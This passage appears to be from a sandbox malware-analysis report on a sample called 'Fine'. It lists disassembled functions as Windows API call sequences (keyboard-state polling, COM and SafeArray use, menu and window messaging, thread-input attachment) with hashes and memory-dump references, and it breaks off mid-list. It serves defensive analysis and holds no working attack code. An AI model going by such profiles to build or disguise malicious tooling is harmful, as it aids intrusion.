                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 92c13eb5f97c6b575071d1bc03d45188a87dc361444da3a8d990eeac654820fa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5374b62f2c3525d7e2bc0f53bbf80f409f414db22864f8a72822ef00438cc110
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92c13eb5f97c6b575071d1bc03d45188a87dc361444da3a8d990eeac654820fa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0C15671628305AFD700EF68C88492BB7E9FF89749F10491DF98A9B210DB71ED49CB52
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00248538
                                                                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002485D4
                                                                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 002485E8
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CD4,00000000,00000001,00297E8C,?), ref: 00248634
                                                                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002486B9
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00248711
                                                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0024879C
                                                                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002487BF
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 002487C6
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0024881B
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00248821
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 15ffdaf9607c7bd282555459217135b515efa8a48965167e3f83e28b08f6fdc3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2acc3a88c01aa46702db3797e54abe8b468f554325b8c0f9faacdd681a16d3bb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ffdaf9607c7bd282555459217135b515efa8a48965167e3f83e28b08f6fdc3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68C11875A10119EFCB14DFA4C888DAEBBF9FF48304B158599E41A9B361DB30EE45CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0023039F
                                                                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 002303F8
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0023040A
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0023042A
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0023047D
                                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00230491
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002304A6
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 002304B3
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002304BC
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002304CE
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002304D9
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f7d38163d2f06642bdbb06f44578386b8942a48f907f2b0c601fa0fd2d7ebe13
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 053b2886297dbdb6784ac7a8d4bc1b0561c98e459c4637af58b041fc79047040
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7d38163d2f06642bdbb06f44578386b8942a48f907f2b0c601fa0fd2d7ebe13
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10415175E1021DDFCB10DF95D8989AE7BB9EF48344F008065EA45A7261CB70EE55CFA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023A65D
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0023A6DE
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0023A6F9
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0023A713
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0023A728
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0023A740
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0023A752
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0023A76A
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0023A77C
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0023A794
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0023A7A6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 69551f69251a9e59e972929dde263f160d0c4274f92ff0e5a52c3c76ef8255f9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1764371a326a33d630faa4f7e5ed902e07c7da866ab1f300dc5929eecf1eedee
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69551f69251a9e59e972929dde263f160d0c4274f92ff0e5a52c3c76ef8255f9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641F8F46247CB6DFF318E6084493A9FEB4AB11304F08806DD5C64A5C2EBD499E4CB93
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e659f4b00d332ba4224a18c9cab7b82252ce51e287cc16b9f52ef86d0aaa83be
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fb6bb3227bce4261655b105e3f4a33b9b6f353e43b61c470b6f464dddca8439f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e659f4b00d332ba4224a18c9cab7b82252ce51e287cc16b9f52ef86d0aaa83be
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B51E231A20117DBCF14DFA8C9509BEB3A5BF65321B20422AEC66E7380DB31DE94C794
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 002541D1
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 002541DC
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00270B44,?), ref: 00254236
                                                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 002542A9
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00254341
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00254393
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fd498b707de6a4754b6813bca30248a842b2705cffb40a1e9f74b43529927aee
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 078d1a04f24b712ac414cb41023e9ce1336fd7b844ddfebdf02bfe83f743da72
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd498b707de6a4754b6813bca30248a842b2705cffb40a1e9f74b43529927aee
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C61D270628711AFC310EF54D888B6EF7E4AF49719F100449FC85972A1C770ED98CB96
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00248C9C
                                                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00248CAC
                                                                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00248CB8
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00248D55
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248D69
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248D9B
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00248DD1
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248DDA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 12e498f94c9a8873555972908e596a2aefb42e53972acf608863fc1c23a6924f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fbc40bce9b22a2f8b85ae829123bb5c9c18b34d4c8261836543ca858de40f59f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12e498f94c9a8873555972908e596a2aefb42e53972acf608863fc1c23a6924f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39615A729243059FCB14EF60C884AAFB3E8FF99314F04491EF98987251DB35E955CB92
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00264715
                                                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00264724
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002647AC
                                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 002647C0
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 002647CA
                                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002647F7
                                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 002647FF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7adf78b96af6d8e7d391fc52c35d00de8af58b7518d7e663b7fb91d99d932734
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 682b3db6549cc08a2483f896ef6e5ddd1b4666f6c49fb263d184b85828e7d97d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7adf78b96af6d8e7d391fc52c35d00de8af58b7518d7e663b7fb91d99d932734
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1418D75A1124AEFDB14DF64E848EAA7BB6FF09314F144129FA4697350C770A924CF50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002328B1
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 002328BC
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 002328D8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002328DB
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 002328E4
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 002328F8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002328FB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0a183f7f7fc7c6025c89cf47c65cc96e2676aa658469d445ab47dcdca08cf47c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 19fcdbfdff772980e55bca6bb231150418129aca3ae256ed066b930676af8591
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a183f7f7fc7c6025c89cf47c65cc96e2676aa658469d445ab47dcdca08cf47c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B21C2B4E10118FBCF01AFA0DC89EEEBBB9EF15310F104156F952A32A1DB755818DB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00232990
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 0023299B
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 002329B7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002329BA
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 002329C3
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 002329D7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002329DA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b8a4b8a7addda79c4d8b17d15b132a6935217141e5c65483ad4fdee7dd81c5f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 77e1e3d055a51b78e71b76879880683d013bbf4160b449f857384620c68f3dd9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b8a4b8a7addda79c4d8b17d15b132a6935217141e5c65483ad4fdee7dd81c5f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69219FB5E10218FBCF01AFA0DC89EEEBBB9EF15300F104156F952A72A1DB755819DB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00264539
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0026453C
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00264563
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00264586
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002645FE
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00264648
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00264663
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0026467E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00264692
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002646AF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 527fabb86e16cb1b9b6c5e7bf4404b2341cdfb51c9e82ac0b7b1b9150443f49b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 94a5faced9369ab61168633a4b978299842e3fba025e7ae80e9d7f6deafffbaf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 527fabb86e16cb1b9b6c5e7bf4404b2341cdfb51c9e82ac0b7b1b9150443f49b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96619E75A00209EFDB10DFA8CC81EEE77B8EF0A710F10415AFA44E72A1D774A999DB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023BB18
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB2C
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0023BB33
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB42
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0023BB54
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB6D
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB7F
